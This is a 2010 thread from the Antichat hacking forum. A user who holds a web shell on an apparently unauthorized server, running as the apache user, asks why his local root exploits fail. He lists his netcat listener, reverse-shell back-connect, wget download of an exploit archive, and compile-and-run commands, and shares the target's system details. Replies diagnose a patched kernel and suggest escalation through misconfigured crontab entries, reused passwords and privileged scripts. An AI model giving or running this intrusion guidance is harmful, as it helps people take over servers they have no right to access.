Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   [Проблема при получении рута сервера!] (https://forum.antichat.xyz/showthread.php?t=208881)

3Mind 03.06.2010 16:57
[Проблема при получении рута сервера!]
 
Привет всем.
Пишу уже вторую подобную тему на этом форуме...
Проблема заключается в том что я не могу получить права рута на сервере.
Юзаю разные эксплоиты но в итоге получаю различные ошибки при исполнении эксплоита, преимущественно такую "Permission denied"
Также при подключении через бэк-коннект к netcat появляется сообщение: "sh: no job control in this shell"

Очень хотел бы разобраться и выяснить что же я делаю не так, для этого полностью опишу последовательность выполняемых мною действий:
1. Захожу в netcat и открываю порт на прослушку, вот такой командой:
-l -p 7878
2. Далее захожу в шелл (использую WSO) и выбираю бэк-конект на свою машину (на порт который открыл на прослушку в netcat'е)
3. Получаю эксплоит из веба (командой wget http://site.ru/exploit.tar), либо сохраняю в файл на своем компьютере с расширением "c", а потом загружаю его на целевой сервер посредством шелла.
4. Если сплоит в единственном файле на "с" то последовательность моих команд из-под netcat'а следующая:
gcc exploit.c -o exploit
chmod -x exploit
./exploit
5. Если сплоит не один и лежит в архиве тогда делаю так:
tar exploit.tar
cd exploit
./run.sh

Вот собственно и все хотелось бы услышать дельный совет в чем может быть моя ошибка, сразу оговорюсь что это уже второй шелл с данной проблемой, еще ни одного рута я получить не смог.
P.S.
id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux 159794-app1.***.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 E
DT 2009 i686 i686 i386 GNU/Linux

$n@ke 03.06.2010 19:41
Цитата:
преимущественно такую "Permission denied"
не нужно лить сплойт в папку /tmp или /var/tmp.

Цитата:
появляется сообщение: "sh: no job control in this shell"
это не страшно и в порядке вещей.

ну во-первых можно и без chmod, если скомпилил из сорцов, и вобще-то надо chmod +x exploit

а во вторых - ищи другой сплойт)

3Mind 03.06.2010 19:56
Цитата:
Сообщение от $n@ke
не нужно лить сплойт в папку /tmp или /var/tmp.
я не храню сплоит в папке /tmp, он у меня лежит в папке с одним из сайтов...

Цитата:
Сообщение от $n@ke
ну во-первых можно и без chmod, если скомпилил из сорцов, и вобще-то надо chmod +x exploit
да, да так и делаю просто ошибся когда тут писал. =)

Цитата:
Сообщение от $n@ke
а во вторых - ищи другой сплойт)
я уже сплоитов 20 попробовал не один не подошел, поэтому и стал думать что может я что-то неправильно делаю.
Посоветуй что нибудь, хотябы где искать, milw0rm.com я уже облазил ничего не нашел подходящего, также искал через exploitsearch.com, тоже никакого результата.

overxor 03.06.2010 20:05
ядро патченое, ищи другие пути получения рута

3Mind 03.06.2010 23:44
Цитата:
Сообщение от overxor
ядро патченое, ищи другие пути получения рута
а какими способами помимо эксплоитов можно получить права рута?

Ins3t 04.06.2010 03:24
overxor хотел сказать, что нужно поискать эксплоиты не под ядро, а под конкретные операционные системы и их сервисы.

overxor 05.06.2010 18:01
Да Ins3t прав. Смотри права на системные файлы (к примеру /etc/crontab. Если есть не стандартные записи следуй по ним. Часто бывает что на сами исполняемые скрипты стоят не правильные права) . Пробуй одинаковые пароли. Ищи самописные сервисы, скрипты исполняемые с наивысшими правами.


Время: 00:03